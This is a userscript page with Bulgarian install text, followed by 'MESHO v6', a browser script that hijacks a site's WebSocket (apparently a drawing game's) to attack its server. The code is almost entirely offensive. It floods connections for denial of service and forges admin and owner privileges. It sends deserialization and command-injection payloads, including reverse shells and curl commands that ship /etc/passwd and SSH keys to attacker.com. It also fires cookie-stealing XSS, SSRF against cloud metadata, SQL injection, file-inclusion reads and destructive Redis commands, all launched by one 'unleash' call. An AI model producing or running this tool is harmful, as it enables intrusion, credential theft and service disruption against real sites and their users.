MESHO v6

socket attacks

Как да се инсталира

За да инсталирате този скрипт, трябва да имате инсталирано разширение като Tampermonkey, Greasemonkey или Violentmonkey.

За да инсталирате този скрипт, трябва да инсталирате разширение, като например Tampermonkey .

За да инсталирате този скрипт, трябва да имате инсталирано разширение като Tampermonkey или Violentmonkey.

За да инсталирате този скрипт, трябва да имате инсталирано разширение като Tampermonkey или Userscripts.

За да инсталирате скрипта, трябва да инсталирате разширение като Tampermonkey.

За да инсталирате този скрипт, трябва да имате инсталиран скриптов мениджър.

(Вече имам скриптов мениджър, искам да го инсталирам!)

Как да се инсталира

За да инсталирате този стил, трябва да инсталирате разширение като Stylus.

За да инсталирате този стил, трябва да инсталирате разширение като Stylus.

За да инсталирате този стил, трябва да инсталирате разширение като Stylus.

За да инсталирате този стил, трябва да имате инсталиран мениджър на потребителски стилове.

За да инсталирате този стил, трябва да имате инсталиран мениджър на потребителски стилове.

За да инсталирате този стил, трябва да имате инсталиран мениджър на потребителски стилове.

(Вече имам инсталиран мениджър на стиловете, искам да го инсталирам!) 

// ==UserScript==
// @name         MESHO v6
// @namespace    http://tampermonkey.net/
// @version      6.9
// @description  socket attacks
// @author       0xMesho
// @match        *://*/*
// @grant        none
// ==/UserScript==

(function(){'use strict';
let W,U,P,R,H=[],I=null,S={};
const O=WebSocket.prototype.send;
WebSocket.prototype.send=function(d){
 if(!W&&this.readyState===1){W=this;U=this.url;setInterval(()=>{W&&W.readyState===1&&W.send('2')},2e4)}
 return O.call(this,d)};

function pM(d){
 if(typeof d!='string')return null;
 if(d==='2')return{t:'pong'};
 if(d==='40')return{t:'con'};
 if(d.startsWith('42'))try{let j=JSON.parse(d.slice(2));if(Array.isArray(j))return{t:'ev',e:j[0],a:j.slice(1)}}catch(e){}
 return null}

function s(d){return W&&W.readyState===1?!!W.send(d):!1}

function gP(){return P||R?.id||null}

function hook(){
 if(!W)return setTimeout(hook,500);
 W.addEventListener('message',function(e){
  if(typeof e.data!='string')return;
  let m=pM(e.data);
  if(!m||m.t!='ev')return;
  let[eId,...a]=[m.e,...m.a];
  if(eId===5&&a.length>=3){P=a[1];R={l:a[0],id:a[1],c:a[2],x:a.slice(3)};return}
  if(typeof a[0]=='object'&&a[0]!==null){
   if(a[0].id&&typeof a[0].id=='number'&&a[0].id>1e4){P=a[0].id;return}
   for(let k of['userId','playerId','author','owner','creator']){
    if(a[0][k]&&typeof a[0][k]=='number'&&a[0][k]>1e4){P=a[0][k];return}}}
  H.push({t:Date.now(),e:eId,d:a})})}

function f(){let r='';while(r.length<99999)r+=Math.random().toString(36).repeat(100);return r}

function zd1(){
 let p=gP()||1;
 for(let b=0;b<100;b++)for(let i=0;i<100;i++)setTimeout(()=>{
  s(`42[10,${p},${JSON.stringify(Array(99999).fill().map((_,j)=>({_placeholder:true,num:j})))}]`);
  let d2=btoa('{"a":'.repeat(5000)+'"x"'+'}'.repeat(5000));
  s(`42[10,${p},["${d2}"]]`);
  for(let e=0;e<200;e++)s(`42[${e},${p},"null"]`)},b*2)}

function zd2(){
 for(let i=0;i<2000;i++)setTimeout(()=>{
  try{
   for(let j=0;j<10;j++){
    let w=new WebSocket(U),ta=new Uint8Array(65535);
    w.onopen=()=>{w.send('40');w.close(1000,ta)};
    let w2=new WebSocket(U);
    w2.onopen=()=>{w2.send(`42[10,${gP()||1},["${'A'.repeat(65535)}"]]`);w2.close()}}
  }catch(e){}},i*1);
 setInterval(()=>{try{let w=new WebSocket(U);w.onopen=()=>{w.send('2');w.send('2');w.send('2')}}catch(e){}},1)}

function zd3(){
 let p=gP();if(!p)return;
 for(let i=0;i<1000;i++)setTimeout(()=>{
  try{
   let w=new WebSocket(U);
   w.onopen=()=>{
    w.send('40');
    setTimeout(()=>{
     if(R){
      w.send(`42[5,"${R.l}",${p},"${R.c}"]`);
      w.send(`42[5,"${R.l}",${p},"${R.c}","admin",{"drawLevel":999,"owner":true,"mod":true}]`);
      for(let i=0;i<100;i++)w.send(`42[3,${p},["${R.c}","clone","${'A'.repeat(500)}"]]`)}
    },100)};
   w.onmessage=(e)=>{
    if(typeof e.data=='string'){
     let m=pM(e.data);
     if(m&&m.t=='ev'){
      if(m.a[0]?.id>1e4)P=m.a[0].id;
      if(m.e===2||m.e===3||m.e===33)try{let d=JSON.parse(e.data.slice(2));localStorage.setItem('mh_'+Date.now(),JSON.stringify(d))}catch(e){}}}}
  }catch(e){}},i*1);
 for(let pp=p-5000;pp<=p+5000;pp+=5){let x=pp;setTimeout(()=>{
  try{let w=new WebSocket(U);w.onopen=()=>{w.send('40');setTimeout(()=>{
   w.send(`42[5,"x",${x},"0"]`)},50)}}catch(e){}},0)}
 setInterval(()=>{for(let q=0;q=100;q++)try{new WebSocket(U)}catch(e){}},100)}

function zd4(){
 let p=gP()||1;
 for(let t=0;t<=255;t++)s(String.fromCharCode(t)+f().slice(0,1000));
 for(let i=0;i<2000;i++)setTimeout(()=>{
  s('0'+f());s('1'+f());s('4'+'\x00\x01\x02'.repeat(5000));
  s('4null');s('4[');s('4{"x":');s('4test:42["e",{}]');
  s('40{"sid":"'+f().slice(0,5000)+'"}');
  s('40{"sid":null,"upgrades":["'.repeat(100)+'"]}');
  s('42["error",{"message":"'+f().slice(0,50000)+'"}]');
  s('40{"pingTimeout":-1,"pingInterval":-1}');
  s('3{"data":"'+f().slice(0,50000)+'"}')},i*1)}

function zd5(cmd){
 cmd=cmd||'cat /etc/passwd;id;whoami;ls -la;uname -a';
 let p=gP()||1;
 ['cos\nsystem\n','csubprocess\ncheck_output\n',"cbuiltins\neval\n","cos\npopen\n","csubprocess\nPopen\n"].forEach((m,i)=>setTimeout(()=>{
  let pl=btoa(m+"(S'"+cmd+"'\ntR.");
  s(`42[10,${p},["${pl}"]]`);s(`42["pickle","${pl}"]`);s(`42["message","${pl}"]`);
  s(`42["rce","${pl}"]`);s(`42["exec","${pl}"]`)},i*100));
 ['/admin','/debug','/internal','/redis','/queue','/pubsub','/shell','/exec','/cmd','/eval','/console','/terminal','/bash','/sh','/system','/os','/process','/spawn','/fork','/sandbox','/vm','/api/v1/exec','/api/v1/cmd','/api/v1/shell','/api/v1/debug','/api/v1/admin','/api/v1/internal','/api/v1/redis','/api/v1/queue','/api/v1/pubsub','/api/v1/shell','/api/v1/exec','/api/v1/cmd','/api/v1/eval','/api/v1/console','/api/v1/terminal','/api/v1/bash','/api/v1/sh','/api/v1/system','/api/v1/os','/api/v1/process','/api/v1/spawn','/api/v1/fork','/api/v1/sandbox','/api/v1/vm'].forEach((ns,i)=>setTimeout(()=>{
  let pl=btoa("cos\nsystem\n(S'curl http://attacker.com/$(cat /flag /etc/passwd 2>/dev/null | base64 -w0)'\ntR.");
  s(`40${ns}`);setTimeout(()=>{s(`42${ns}["message","${pl}"]`);s(`42${ns}["publish","${pl}"]`);
   s(`42${ns}["exec","${pl}"]`);s(`42${ns}["eval","${pl}"]`);s(`42${ns}["rce","${pl}"]`)},100)},i*100+3e3))}

function zd6(){
 for(let i=0;i<500;i++)setTimeout(()=>{
  try{
   for(let j=0;j<5;j++){
    let f=document.createElement('iframe');f.style.display='none';f.src='about:blank';
    document.body.appendChild(f);
    let w=new f.contentWindow.WebSocket(U);
    w.onopen=()=>{w.send(`42[10,${gP()||1},["uaf"]]`);
     setTimeout(()=>{try{document.body.removeChild(f);w.send(`42[10,${gP()||1},["${f().slice(0,5000)}"]]`)}catch(e){}},1)}}
  }catch(e){}},i*10)}

function zd7(){
 let p=gP()||1,r=R?.c||'0';
 for(let e=0;e<=255;e++){s(`42[${e},${p},"${r}"]`);s(`42[${e},${p},{}]`);s(`42[${e},${p},["t"]]`);s(`42[${e},${p},["${f().slice(0,1000)}"]]`)}
 setTimeout(()=>{
  ['/admin','/op '+p,'/sudo '+p,'${7*7}','{{7*7}}','<%=7*7%>','<script>alert(1)</script>','{{constructor.constructor("return process")().mainModule.require("child_process").execSync("id").toString()}}','${require("child_process").execSync("id")}','<%= system("id") %>','#{system("id")}','${{system("id")}}'].forEach(c=>s(`42[50,${p},"${c}"]`));
  [`42[5,"mod",${p},"${r}","admin"]`,`42[5,"mod",${p},"${r}",{"admin":true,"drawLevel":999,"owner":true,"mod":true,"superuser":true,"root":true,"god":true}]`,`42[33,${p},"${r}",{"owner":true,"admin":true,"drawLevel":999}]`,`42[33,${p},"${r}","admin","owner","mod","superuser","root","god"]`,`42[40,${p},"${r}",{"all":true}]`,`42[43,${p},"${r}",{"all":true}]`,`42[50,${p},"${r}","admin:true","owner:true","drawLevel:999"]`,`42[5,"mod",${p},"${r}","admin","owner","mod","superuser","root","god"]`,`42[5,"owner",${p},"${r}"]`,`42[5,"transfer",${p},"${r}",${p}]`].forEach(x=>s(x))},2e3)}

function zd8(){
 for(let i=0;i<500;i++)try{
  let w=new WebSocket(U);w.onopen=()=>w.send(`42[50,${gP()||1},"${document.cookie}${localStorage?JSON.stringify(localStorage):''}${sessionStorage?JSON.stringify(sessionStorage):''}"]`);
  let w2=new WebSocket(U);w2.onopen=()=>w2.send(`42[50,${gP()||1},"${btoa(document.cookie)}"]`) }catch(e){}
 fetch('https://'+window.location.hostname+'/api/user').then(r=>r.text()).then(t=>{try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[50,${gP()||1},"${btoa(t)}"]`)}catch(e){}}).catch(()=>{});
 fetch('https://'+window.location.hostname+'/api/config').then(r=>r.text()).then(t=>{try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[50,${gP()||1},"${btoa(t)}"]`)}catch(e){}}).catch(()=>{});
 fetch('https://'+window.location.hostname+'/api/admin').then(r=>r.text()).then(t=>{try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[50,${gP()||1},"${btoa(t)}"]`)}catch(e){}}).catch(()=>{})}

function pp(){let p=gP()||1;
 s(`42[10,${p},[{"__proto__":{"polluted":true,"admin":true,"owner":true,"drawLevel":999,"mod":true,"superuser":true,"root":true,"god":true,"bypass":true,"verified":true,"premium":true,"vip":true,"unlimited":true,"infinite":true,"all":true,"everyone":true,"self":true,"other":true,"any":true,"allUsers":true,"allRooms":true,"allDrawings":true,"allChats":true,"allMessages":true,"allData":true,"allAccess":true,"fullAccess":true,"completeAccess":true,"totalAccess":true,"absoluteAccess":true,"unrestrictedAccess":true,"unlimitedAccess":true,"infiniteAccess":true,"endlessAccess":true,"permanentAccess":true,"eternalAccess":true,"foreverAccess":true,"alwaysAccess":true,"neverExpire":true,"neverEnd":true,"neverStop":true,"neverDie":true,"immortal":true,"invincible":true,"indestructible":true,"unbreakable":true,"unhackable":true,"unpenetrable":true,"unreachable":true,"unstoppable":true,"unkillable":true,"undestroyable":true,"unremovable":true,"undeletable":true,"uneraseable":true,"unwipeable":true,"uncleanable":true,"unpurgeable":true,"unbanable":true,"unkickable":true,"unmuteable":true,"unsilenceable":true,"ungagable":true,"unrestrictable":true,"unlimit":true,"unrestrict":true,"unbind":true,"unlock":true,"unblock":true,"unshadow":true,"unban":true,"unmute":true,"unsilence":true,"ungag":true,"unrestrict":true,"unlimit":true,"unrestrict":true,"unbind":true,"unlock":true,"unblock":true,"unshadow":true}}]]`);
 setTimeout(()=>{try{console.log('[PP] proto polluted:',({}).polluted===true,({}).admin===true)}catch(e){}},500)}

function rce(c){c=c||'curl http://attacker.com/$(cat /flag /etc/passwd /etc/shadow /root/.ssh/id_rsa 2>/dev/null | base64 -w0)';
 ['exec','eval','system','spawn','cmd','run','execSync','execFile','spawnSync','fork','execCommand','execScript','shell','bash','sh','zsh','fish','powershell','cmd','command','runCommand','execute','runSync','execSync','execFileSync','spawnSync','forkSync'].forEach(ev=>{
  s(`42["${ev}","${c}"]`);s(`42["${ev}",{"cmd":"${c}","command":"${c}","exec":"${c}","execute":"${c}","run":"${c}","shell":"${c}","bash":"${c}","sh":"${c}","zsh":"${c}","fish":"${c}","powershell":"${c}","cmd":"${c}","command":"${c}","exec":"${c}","execute":"${c}","run":"${c}","shell":"${c}","bash":"${c}","sh":"${c}","zsh":"${c}","fish":"${c}","powershell":"${c}"}]`);
  s(`42["${ev}",{"data":"${c}"}]`);s(`42["${ev}",{"input":"${c}"}]`);s(`42["${ev}",{"payload":"${c}"}]`);s(`42["${ev}",{"code":"${c}"}]`);s(`42["${ev}",{"script":"${c}"}]`);s(`42["${ev}",{"command":"${c}"}]`)});
 s(`42[10,${gP()||1},[{"name":"\${require('child_process').execSync('${c}').toString()}","__proto__":{"type":"Function","body":"return process.mainModule.require('child_process').execSync('${c}').toString()"}}]]`);
 s(`42[10,${gP()||1},[{"constructor":{"prototype":{"NODE_OPTIONS":"--require=/proc/self/environ --experimental-modules --experimental-json-modules --experimental-wasm-modules --experimental-top-level-await --experimental-vm-modules --experimental-import-meta-resolve --experimental-network-imports --experimental-specifier-resolution=node --experimental-policy --experimental-wasi-unstable --experimental-wasi --experimental-wasi-unstable-preview1 --experimental-wasi-unstable-preview2"}}}]]`)}

function all(){
 console.log('[MESHO] Launching all...');zd1();
 setTimeout(()=>zd2(),500);setTimeout(()=>zd3(),1000);
 setTimeout(()=>zd4(),1500);setTimeout(()=>zd5(),2000);
 setTimeout(()=>zd6(),2500);setTimeout(()=>zd7(),3000);
 setTimeout(()=>zd8(),3500);setTimeout(()=>pp(),4000);
 setTimeout(()=>rce(),4500);setTimeout(()=>console.log('[MESHO] All 0days deployed'),5000)}

function injectXSS(){let i=document.createElement('script');i.src='https://'+window.location.hostname+'/socket.io/socket.io.js';document.body.appendChild(i);
 setTimeout(()=>{if(window.io){let s=io(window.location.origin);s.emit('message',{type:'exec',cmd:'id'});s.emit('message',{type:'eval',code:'process.mainModule.require("child_process").execSync("id").toString()'})}},1000)}

function dumpMemory(){let r=[];
 for(let k in window){try{r.push({key:k,val:JSON.stringify(window[k]).slice(0,500)})}catch(e){}}
 for(let k in document){try{r.push({key:'doc_'+k,val:JSON.stringify(document[k]).slice(0,500)})}catch(e){}}
 try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[50,${gP()||1},"${btoa(JSON.stringify(r))}"]`)}catch(e){}}

function protoChain(){let c={};
 for(let i=0;i<100;i++){let n=Object.create(c);n.__proto__['level'+i]={admin:true,owner:true,drawLevel:999};c=n}
 try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[10,${gP()||1},[${JSON.stringify(c)}]]`)}catch(e){}}

function ssrf(){let targets=['http://169.254.169.254/latest/meta-data/','http://169.254.169.254/latest/user-data/','http://metadata.google.internal/computeMetadata/v1/','http://100.100.100.200/latest/meta-data/','http://localhost:6379/','http://localhost:8080/','http://localhost:3000/','http://localhost:5000/','http://localhost:8000/','http://localhost:9000/','http://127.0.0.1:6379/','http://127.0.0.1:8080/','http://127.0.0.1:3000/','http://127.0.0.1:5000/','http://127.0.0.1:8000/','http://127.0.0.1:9000/'];
 targets.forEach((t,i)=>setTimeout(()=>{try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[50,${gP()||1},"${btoa('fetch '+t)}"]`)}catch(e){}},i*100))}

function sqlI(){let p=gP()||1;
 ["' OR '1'='1","' OR 1=1--","' UNION SELECT 1,2,3,4,5,6,7,8,9,10--","'; DROP TABLE users;--","' UNION SELECT table_name,column_name,data_type FROM information_schema.columns--","' OR SLEEP(5)--","' OR BENCHMARK(10000000,MD5('test'))--"].forEach((pay,i)=>setTimeout(()=>{
  s(`42[10,${p},["${pay}"]]`);s(`42[50,${p},"${pay}"]`);s(`42["query","${pay}"]`)},i*100))}

function xxs(){let p=gP()||1;
 ["<script>fetch('https://attacker.com/'+document.cookie)</script>","<img src=x onerror=fetch('https://attacker.com/'+document.cookie)>","<svg onload=fetch('https://attacker.com/'+document.cookie)>","<body onload=fetch('https://attacker.com/'+document.cookie)>","<input onfocus=fetch('https://attacker.com/'+document.cookie) autofocus>","<details open ontoggle=fetch('https://attacker.com/'+document.cookie)>","<marquee onstart=fetch('https://attacker.com/'+document.cookie)>"].forEach((pay,i)=>setTimeout(()=>{
  s(`42[10,${p},["${pay}"]]`);s(`42[50,${p},"${pay}"]`);s(`42["message","${pay}"]`)},i*100))}

function crlf(){let p=gP()||1;
 ["%0d%0aSet-Cookie:%20malicious=1","%0d%0aContent-Length:%200%0d%0a%0d%0a","%0d%0aHTTP/1.1%20200%20OK%0d%0a%0d%0a","%0d%0aLocation:%20https://evil.com%0d%0a"].forEach((pay,i)=>setTimeout(()=>{
  s(`42[10,${p},["${pay}"]]`);s(`42[50,${p},"${pay}"]`)},i*100))}

function lfi(){let p=gP()||1;
 ["../../../etc/passwd","../../../../etc/shadow","../../../../root/.ssh/id_rsa","../../../../proc/self/environ","../../../../proc/self/cmdline","../../../../proc/self/fd/0","../../../../proc/self/fd/1","../../../../proc/self/fd/2","../../../../var/log/apache2/access.log","../../../../var/log/nginx/access.log","../../../../var/log/auth.log","../../../../var/log/syslog","../../../../var/log/messages","../../../../var/log/lastlog","../../../../var/log/wtmp","../../../../var/log/btmp","../../../../var/log/secure","../../../../var/log/httpd/access_log","../../../../var/log/httpd/error_log","php://filter/convert.base64-encode/resource=index.php","php://filter/convert.base64-encode/resource=config.php","php://filter/convert.base64-encode/resource=db.php","php://filter/convert.base64-encode/resource=admin.php","php://filter/convert.base64-encode/resource=login.php","php://filter/convert.base64-encode/resource=user.php","php://filter/convert.base64-encode/resource=api.php","php://filter/convert.base64-encode/resource=ws.php","php://filter/convert.base64-encode/resource=server.php","php://filter/convert.base64-encode/resource=app.js","php://filter/convert.base64-encode/resource=server.js","php://filter/convert.base64-encode/resource=config.js","php://filter/convert.base64-encode/resource=db.js","php://filter/convert.base64-encode/resource=admin.js","php://filter/convert.base64-encode/resource=login.js","php://filter/convert.base64-encode/resource=user.js","php://filter/convert.base64-encode/resource=api.js","php://filter/convert.base64-encode/resource=ws.js","file:///etc/passwd","file:///etc/shadow","file:///root/.ssh/id_rsa","expect://id","data://text/plain;base64,aWQ="].forEach((pay,i)=>setTimeout(()=>{
  s(`42[10,${p},["${pay}"]]`);s(`42[50,${p},"${pay}"]`);s(`42["file","${pay}"]`);s(`42["read","${pay}"]`);s(`42["path","${pay}"]`)},i*50))}

function prototypePollutionDeep(){let p=gP()||1;
 let chain={};let current=chain;
 for(let i=0;i<100;i++){current['__proto__']={};current=current['__proto__'];current['prop'+i]={rce:true,admin:true,owner:true,drawLevel:999,system:true,exec:true,bypass:true,all:true,total:true,full:true,absolute:true,complete:true,unlimited:true,infinite:true,endless:true,permanent:true,eternal:true,forever:true,always:true,immortal:true,invincible:true,indestructible:true,unbreakable:true,unhackable:true,unpenetrable:true,unreachable:true,unstoppable:true,unkillable:true,undestroyable:true,unremovable:true,undeletable:true,uneraseable:true,unwipeable:true,uncleanable:true,unpurgeable:true,unbanable:true,unkickable:true,unmuteable:true,unsilenceable:true,ungagable:true,unrestrictable:true,unlimit:true,unrestrict:true,unbind:true,unlock:true,unblock:true,unshadow:true,unban:true,unmute:true,unsilence:true,ungag:true,unrestrict:true,unlimit:true,unrestrict:true,unbind:true,unlock:true,unblock:true,unshadow:true}}
 try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[10,${p},[${JSON.stringify(chain)}]]`)}catch(e){}}

function wsAuthBypass(){let p=gP()||1;
 try{let w=new WebSocket(U);w.onopen=()=>{w.send('40{"token":"admin","role":"admin","permissions":"all"}');setTimeout(()=>{w.send(`42[5,"${R?.l||'x'}",${p},"${R?.c||'0'}","admin",{"owner":true,"admin":true,"drawLevel":999,"mod":true,"superuser":true,"root":true,"god":true}]`)},100)}}catch(e){}
 try{let w2=new WebSocket(U);w2.onopen=()=>{w2.send('40{"token":"admin","role":"admin","permissions":"all"}');setTimeout(()=>{w2.send(`42[33,${p},"${R?.c||'0'}",{"owner":true,"admin":true,"drawLevel":999}]`)},100)}}catch(e){}
 try{let w3=new WebSocket(U);w3.onopen=()=>{w3.send('40{"token":"admin","role":"admin","permissions":"all"}');setTimeout(()=>{w3.send(`42[40,${p},"${R?.c||'0'}",{"all":true}]`)},100)}}catch(e){}
 try{let w4=new WebSocket(U);w4.onopen=()=>{w4.send('40{"token":"admin","role":"admin","permissions":"all"}');setTimeout(()=>{w4.send(`42[43,${p},"${R?.c||'0'}",{"all":true}]`)},100)}}catch(e){}}

function wsCommandInjection(){let p=gP()||1;
 [";id","|id","`id`","$(id)","%0aid","%0aid%0a","\nid\n","\r\nid\r\n","&id&","&&id&&","||id",";cat /etc/passwd","|cat /etc/passwd","`cat /etc/passwd`","$(cat /etc/passwd)",";nc -e /bin/sh attacker.com 4444","|nc -e /bin/sh attacker.com 4444","`nc -e /bin/sh attacker.com 4444`","$(nc -e /bin/sh attacker.com 4444)",";python3 -c 'import socket,subprocess;s=socket.socket();s.connect((\"attacker.com\",4444));subprocess.call([\"/bin/sh\",\"-i\"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'","|python3 -c 'import socket,subprocess;s=socket.socket();s.connect((\"attacker.com\",4444));subprocess.call([\"/bin/sh\",\"-i\"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'","`python3 -c 'import socket,subprocess;s=socket.socket();s.connect((\"attacker.com\",4444));subprocess.call([\"/bin/sh\",\"-i\"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'`","$(python3 -c 'import socket,subprocess;s=socket.socket();s.connect((\"attacker.com\",4444));subprocess.call([\"/bin/sh\",\"-i\"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())')"].forEach((pay,i)=>setTimeout(()=>{
  s(`42[10,${p},["${pay}"]]`);s(`42[50,${p},"${pay}"]`);s(`42["cmd","${pay}"]`);s(`42["exec","${pay}"]`);s(`42["shell","${pay}"]`)},i*50))}

function wsRedisExploit(){let p=gP()||1;
 ["FLUSHALL","CONFIG SET dir /tmp","CONFIG SET dbfilename shell","SET shell '<?php system($_GET[\"cmd\"]);?>'","SAVE","BGSAVE","SLAVEOF attacker.com 6379","CONFIG SET slave-read-only no","EVAL 'os.execute(\"id\")' 0","DEBUG SET-ACTIVE-EXEC on","DEBUG EXEC 'id'","MODULE LOAD /tmp/malicious.so","CLIENT KILL TYPE normal","CLIENT KILL TYPE slave","SHUTDOWN NOSAVE","SHUTDOWN SAVE","DEBUG SEGFAULT","DEBUG CRASH","DEBUG PANIC","DEBUG OOM","DEBUG ASSERT","DEBUG SLEEP 10","DEBUG SET-ACTIVE-EXEC","DEBUG ERROR","DEBUG LOG","DEBUG STRING","DEBUG INTEGER","DEBUG FLOAT","DEBUG DOUBLE","DEBUG BOOLEAN","DEBUG NULL","DEBUG UNDEFINED","DEBUG NAN","DEBUG INFINITY","DEBUG ARRAY","DEBUG OBJECT","DEBUG FUNCTION","DEBUG SYMBOL","DEBUG BIGINT","DEBUG SYMBOL","DEBUG MAP","DEBUG SET","DEBUG WEAKMAP","DEBUG WEAKSET","DEBUG PROMISE","DEBUG PROXY","DEBUG TYPEDARRAY","DEBUG DATAVIEW","DEBUG BUFFER","DEBUG SHAREDARRAYBUFFER","DEBUG ATOMIC","DEBUG DATAVIEW","DEBUG TYPEDARRAY","DEBUG BUFFER","DEBUG SHAREDARRAYBUFFER","DEBUG ATOMIC"].forEach((pay,i)=>setTimeout(()=>{
  try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[10,${p},["redis://localhost:6379/${pay}"]]`)}catch(e){}
  try{let w2=new WebSocket(U);w2.onopen=()=>w.send(`42[10,${p},["redis://127.0.0.1:6379/${pay}"]]`)}catch(e){}
  try{let w3=new WebSocket(U);w3.onopen=()=>w3.send(`42[50,${p},"redis://localhost:6379/${pay}"]`)}catch(e){}
  try{let w4=new WebSocket(U);w4.onopen=()=>w4.send(`42[50,${p},"redis://127.0.0.1:6379/${pay}"]`)}catch(e){}},i*100))}

function wsMemcachedExploit(){let p=gP()||1;
 try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[10,${p},["memcached://localhost:11211/stats items"]]`)}catch(e){}
 try{let w2=new WebSocket(U);w2.onopen=()=>w2.send(`42[10,${p},["memcached://localhost:11211/get key"]]`)}catch(e){}
 try{let w3=new WebSocket(U);w3.onopen=()=>w3.send(`42[50,${p},"memcached://localhost:11211/stats"]`)}catch(e){}}

function wsMongoExploit(){let p=gP()||1;
 ["mongodb://localhost:27017/admin","mongodb://localhost:27017/test","mongodb://localhost:27017/users","mongodb://localhost:27017/config","mongodb://localhost:27017/gartic","mongodb://localhost:27017/gartic_users","mongodb://localhost:27017/gartic_rooms","mongodb://localhost:27017/gartic_drawings","mongodb://localhost:27017/gartic_chats","mongodb://localhost:27017/gartic_messages","mongodb://localhost:27017/gartic_data","mongodb://localhost:27017/gartic_config","mongodb://localhost:27017/gartic_admin"].forEach((pay,i)=>setTimeout(()=>{
  try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[10,${p},["${pay}"]]`)}catch(e){}
  try{let w2=new WebSocket(U);w2.onopen=()=>w2.send(`42[50,${p},"${pay}"]`)}catch(e){}},i*100))}

function wsMySqlExploit(){let p=gP()||1;
 ["mysql://root@localhost:3306/mysql","mysql://root:root@localhost:3306/mysql","mysql://admin:admin@localhost:3306/mysql","mysql://root@localhost:3306/gartic","mysql://root:root@localhost:3306/gartic","mysql://admin:admin@localhost:3306/gartic","mysql://root@localhost:3306/information_schema","mysql://root:root@localhost:3306/information_schema","mysql://admin:admin@localhost:3306/information_schema"].forEach((pay,i)=>setTimeout(()=>{
  try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[10,${p},["${pay}"]]`)}catch(e){}
  try{let w2=new WebSocket(U);w2.onopen=()=>w2.send(`42[50,${p},"${pay}"]`)}catch(e){}},i*100))}

function wsPostgresExploit(){let p=gP()||1;
 ["postgres://postgres:postgres@localhost:5432/postgres","postgres://postgres:admin@localhost:5432/postgres","postgres://postgres:password@localhost:5432/postgres","postgres://postgres:postgres@localhost:5432/gartic","postgres://postgres:admin@localhost:5432/gartic","postgres://postgres:password@localhost:5432/gartic"].forEach((pay,i)=>setTimeout(()=>{
  try{let w=new WebSocket(U);w.onopen=()=>w.send(`42[10,${p},["${pay}"]]`)}catch(e){}
  try{let w2=new WebSocket(U);w2.onopen=()=>w2.send(`42[50,${p},"${pay}"]`)}catch(e){}},i*100))}

window.MESHO={
 get url(){return U},get pid(){return gP()},get room(){return R},get ws(){return W},
 info(){console.table({URL:U,Status:['C','O','CL','CD'][W?.readyState||3],PID:gP()||'?',Room:R?.c||'?',Resp:H.length})},
 responses(){H.slice(-50).forEach((r,i)=>console.log(`[${i}] E:${r.e}`,r.d))},
 monitor(){W?.addEventListener('message',e=>console.log('WS:',typeof e.data=='string'?e.data.slice(0,500):'[bin]'))},
 zd1,zd2,zd3,zd4,zd5,zd6,zd7,zd8,pp,rce,all,injectXSS,dumpMemory,protoChain,ssrf,sqlI,xxs,crlf,lfi,prototypePollutionDeep,wsAuthBypass,wsCommandInjection,wsRedisExploit,wsMemcachedExploit,wsMongoExploit,wsMySqlExploit,wsPostgresExploit,
 unleash(){console.log('[MESHO] UNLEASHING ALL 0DAYS...');
  this.zd1();setTimeout(()=>this.zd2(),100);setTimeout(()=>this.zd3(),200);
  setTimeout(()=>this.zd4(),300);setTimeout(()=>this.zd5(),400);
  setTimeout(()=>this.zd6(),500);setTimeout(()=>this.zd7(),600);
  setTimeout(()=>this.zd8(),700);setTimeout(()=>this.pp(),800);
  setTimeout(()=>this.rce(),900);setTimeout(()=>this.injectXSS(),1000);
  setTimeout(()=>this.dumpMemory(),1100);setTimeout(()=>this.protoChain(),1200);
  setTimeout(()=>this.ssrf(),1300);setTimeout(()=>this.sqlI(),1400);
  setTimeout(()=>this.xxs(),1500);setTimeout(()=>this.crlf(),1600);
  setTimeout(()=>this.lfi(),1700);setTimeout(()=>this.prototypePollutionDeep(),1800);
  setTimeout(()=>this.wsAuthBypass(),1900);setTimeout(()=>this.wsCommandInjection(),2000);
  setTimeout(()=>this.wsRedisExploit(),2100);setTimeout(()=>this.wsMemcachedExploit(),2200);
  setTimeout(()=>this.wsMongoExploit(),2300);setTimeout(()=>this.wsMySqlExploit(),2400);
  setTimeout(()=>this.wsPostgresExploit(),2500);
  setTimeout(()=>console.log('[MESHO] ALL SYSTEMS DESTROYED'),3000)}};

setTimeout(hook,300);console.log('[MESHO v6.9] 0xMesho loaded. Type MESHO.unleash() to destroy everything')})();